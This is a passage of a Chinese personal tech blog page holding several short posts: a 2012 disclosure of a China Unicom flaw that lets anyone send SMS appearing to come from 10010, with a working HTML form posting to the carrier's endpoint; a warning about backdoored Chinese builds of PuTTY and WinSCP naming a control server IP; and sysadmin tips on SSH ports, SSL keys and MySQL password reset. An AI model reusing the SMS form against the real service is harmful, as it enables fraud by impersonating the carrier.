SPECIAL OFFER! .COMS just $2.95* per year up to 3 domains! Additional .COMs just $7.99* per year! SPECIAL OFFER! .COMs just $2.95* per year up to 3 domains! Additional .COMs just $7.99* per year! Applies to new and transfer domains, …
中国联通自定义10010给任意联通号发短信漏洞
漏洞详情 披露状态: 2012-02-14: 细节已通知厂商并且等待厂商处理中 2012-02-19: 厂商已经主动忽略漏洞,细节向公众公开 简要描述: 任何人都可以用官方10010给联通手机号发送短信,被用来短信诈骗,危害很大 详细说明: http://info.10010.com/lt/plugin/portal/vild.do是联通用来给客户发联通营业厅信息的,任何人都可以自定义信息发给联通号码,接收的人看到是10010发的,相信程度很高,所以很危险啊 详情可以查看:http://www.wooyun.org/bugs/wooyun-2010-04501/ 这里公布一段利用的代码: <title>中国联通短信漏洞</title> <meta http-equiv="Content-Type" content="text/HTML; charset=GBK"> <form action="http://info.10010.com/lt/plugin/portal/vild.do" method="post"> 验证码<br> <img src="http://info.10010.com/lt/services/yytfb/image.jsp" onclick="this.src=this.src"><br> <input type="text" name="imgCode"><br> 短信接收者<br> <input type="text" name="tel"><br> 内容<br> <input type="text" name="epname"><br> <input type="hidden" name="rem" value="false"> <input …
修改Linux的SSH端口,解决一些安全问题.
今天有朋友问到我这方面的问题,我就在这里写出来提供给大家参考参考. 之前提到一些 扫描SSH密码 的行为,还有最近暴出的汉化版软件后门的事件,那么我们处理完一系列工作后,应该做什么来保障我们的系统安全呢? 这里我讲到的是修改系统默认的SSH端口: 首先修改配置文件: vi /etc/ssh/sshd_config 找到#Port 22,这里是标识默认使用22端口,然后修改成为: Port 22 Port 999 即去掉#Port 22前面的#,添加一些新的端口999. 这样22和999都成为SSH的登录端口了,然后保存退出. 执行: /etc/init.d/sshd restart 如果开启了防火墙的,请编辑一下防火墙的配置: vi /etc/sysconfig/iptables -A INPUT -m state –state NEW -m tcp -p tcp –dport 999 -j ACCEPT 这样就启动了999端口了,然后: /etc/init.d/iptables restart …
部分中文版PuTTY和WinSCP软件内置后门
多个安全达人在微博发布消息,称在汉化版putty、WinSCP、SSH Secure等工具中发现后门。经金山毒霸安全中心验证,这些汉化版管理工具的确存在后门程序,可窃取管理员帐号,从而完全控制linux服务器。建议linux系统管理员应立刻卸载这些汉化版软件,并尽快修改管理员密码。 近期已经有多名Linux服务器管理员爆出服务器被恶意攻击,导致系统root密码泄漏以及资料泄漏,经查可能是由于内置后门的PuTTY和WinSCP工具导致。 PuTTY是知名的Windows开源SSH管理工具,WinSCP是常用的开源SFTP工具。两者皆为免费、开源软件,其中PuTTY从没有官方中文版,而WinSCP已经拥有官方中文版。 但是在百度搜索这两款软件,均出现了竞价广告,并指向非官方授权的中文打包分发网站。不熟悉相关软件的朋友,可能下载到包含后门的SSH连接工具。 经查风险网站可能包含如下站点: ·Winscp中文站,http://www.winscp.cc/。 ·Putty中文站,http://putty.org.cn/。 ·Putty中文站,http://putty.ws/。 三风险网站界面相同,并且使用相同的流量统计代码。下载未经授权的中文打包软件,可能导致服务器管理员密码泄漏、资料泄漏以及服务器风险。 服务器中招的症状可能包括: 1、进程 .osyslog 或 .fsyslog 吃CPU超过100~1000%(O与F 可能为随机) 2、有网络连接往 98.126.55.226:82 大概为主控 3、机器疯狂外发数据 4、/var/log被删除 5、/etc/init.d/sshd被修改 如果你的服务器已经遭到风险威胁,可以尝试更改SSH连接端口,让攻击者找不到入口。 RTdot会将相关风险报告给相关安全厂商,希望网站技术人员从官方下载软件使用。 PuTTY,http://www.putty.org/ WinSCP,http://winscp.net 引用来源:bugbeta、hostloc、zijidelu 检查是否中招的方法: 搜索 /etc/.fsyslog /lib/.fsyslog文件是否存在。 金山毒霸、360安全卫士、QQ电脑管家均已通过官方微博证实消息 http://t.qq.com/p/t/67170110893984 http://weibo.com/1642668915/y3isb2Smm 将通过措施封杀相关后门网址,并建议用户删除相关软件。百度内部人士透露,正在积极进行内部清查,将相关竞价排名服务下线。 这里请大家及时的更改服务器密码,以及下载官方原版! 这里我提供我使用很久的一款putty汉化版,暂时没有发现有后门,不过还是建议去http://www.putty.org下载原版! putty
nokia s60v3手机网络给ipad2共享上网工具
一次偶然的机会,用ipad2蓝牙连接别人一个nokia s40的手机发现了圆环,发现可以上网,对方手机自动联网了… 我就用自己手机连接了好多次,都是无法成功,纳闷了很久,我也懒得寻找具体原因了,明显s60比s40是更保守了,一些朋友也说s60的都不能连接,s40可以! 寻找了很多工具,还是想利用蓝牙之心不死!因为用s40连接后双环很省电,这年头省电才是王道… 不过测试了好几款都是无法利用的,我目前使用的是N86港版的手机,带有wifi,何不利用这一点呢?我记得很久之前下载过一款用手机当无线路由的软件,只是手机刷过很多次,找不到了,于是搜索了很久,找到一款,比我以前的更直观,设置更简单…这里就分享一下吧… 记得用软件签名后再用哦… JoikuSpot.Premium.v3.10 在这里就不上图了,也不说明了,因为软件是中文版的!设置也非常简单,不过在使用的时候记得设置密码,不然…被别人连接使用,到时候流量就像流水了… 我也只是出外紧急的时候用用,我测试了一下速度很不错…
配置HTTPS(SSL),以及取消其密码,方便启动nginx等!
直接进入正题,首先要生成获得证书所需的密钥等文件: openssl genrsa -des3 -out whhack.com.key 1024 openssl req -new -key whhack.com.key -out whhack.com.csr openssl rsa -in whhack.com.key -out whhack.com.key 这样生成的证书必须是输入密码的,那么不输入密码怎么做呢: mv whhack.com.key newwhhack.com.key openssl rsa -in newwhhack.com.key -out whhack.com.key rm newwhhack.com.key 然后根据这个key文件生成证书请求文件: openssl req -new -key whhack.com.key -out whhack.com.csr …
最近被iPad2充电问题困扰,烦心!
自从大神绿毒放出iPad2 A5越狱以来,当天我就越狱了(越狱时候用的工具,后面发出来,是最早的命令行的,个人觉得比较好用,起码错误什么的都看得到,现在的工具还没用!),但是之后充电就没有一次能充满的,开始怀疑是否是越狱造成的,也懒得折腾,所以坚持了几天,偶尔充一点进去… 后来终于忍不住了,研究了一番,发现是温度问题,但是越狱后对我没啥用,就下了两软件,那些所谓的插件,要么不兼容,要么乱七八糟,懒得去折腾,还是刷回来安逸,用点限免和免费的即可… 刷回来后,越狱第二季了,哈哈,又进去了… 开始研究充电的问题,很多人暖水袋之类的,但是暖水袋能热多久呢,充一次电都要3-5小时,何不利用废弃能源呢?!大家想想身边最大的废弃能源是啥…好好想想! 对了,是本本的散热口,相信很多人都有过被散热口烫过的经历,我也是,那么这么大的热能为什么不利用呢,只是我现在用的本才用半年多,散热性能很好,散热口夏天都不是很热,但是这温度积少成多,总比没有好,于是开始… 充电数据线太短,压根就不方便,现在我装备基本都无线了,鼠标都无线鼠标了,只有利用散热口这边的USB3.0接口了,插上去,不再充电…然后把iPad2斜着放在散热口旁边,散热口的风全部直吹iPad裸体的铝合金(把TT拿下来,不然这点温度还暖不了TT的),然后用ITOOLS瞧瞧,慢慢在增长,搞定…. 生活中需要奇思妙想,我们不断遇到很多困难,但是一定有办法可以解决,有的人只能想到很笨拙的办法,有的人能够想到更懒的办法,我们需要的是方便,简单,能达到目的,最重要的是可以节约成本,利用能利用的东东… 越狱工具cinject_0.4.3
mysql忘记密码,简单重置.
今天给大家带来的是linux mysql密码忘记如何重置的办法: 1,停止mysql服务 /etc/init.d/mysql stop 2,加入–skip-grant-tables启动mysql服务,就是跳过权限表认证,启动后,连接到mysql的root不需要口令,空密码即可链接. /etc/init.d/mysql start –skip-grant-tables 3,进入mysql的安装目录,进入mysql cd /usr/local/mysql/bin ./mysql -u root -p 此时会提示你输入密码,但是直接回车即可, 然后出现mysql > 的提示符 之后输入: use mysql; UPDATE user SET password=PASSWORD('root') WHERE user='root'; exit; 此时mysql的root密码就被改为:root,但是这里要注意的是,你是否有root用户,我曾经遇到一个客户的机器删除了root了用户,结果白做了,其他用户自己根据上述sql语句替换即可! 记得重新启动mysql: /etc/init.d/mysql restart 好有很多办法,我觉得这个是最简单直观的,希望能给大家带来一点帮助!
近期评论